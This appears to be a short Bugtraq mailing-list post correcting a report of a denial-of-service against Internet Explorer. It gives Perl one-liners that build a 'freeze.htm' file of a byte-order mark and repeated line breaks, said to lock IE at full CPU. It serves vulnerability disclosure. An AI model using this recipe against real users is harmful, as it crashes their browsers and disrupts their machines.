> >Hello, Bugtraq. > > >Malicious htm file can freeze IE with 100% CPU usage: > >Construct the file freeze.htm: > >c:\>perl -e "print qq'\xFF\xFE'; print qq'\r\n' x 30000" > freeze.htm > This string works only with Active Perl, in unix-like Perl versions exploit string is: perl -e "print qq'\xFF\xFE'; print qq'\r\r\n' x 30000" > freeze.htm Active Perl understand \n = \x0D\x0A, freeze of IE exist only if sequence of bytes will be ...\x0D\x0D\x0A... Sorry, I have not noticed it at once. Best Regards, ERRor, dHtm.
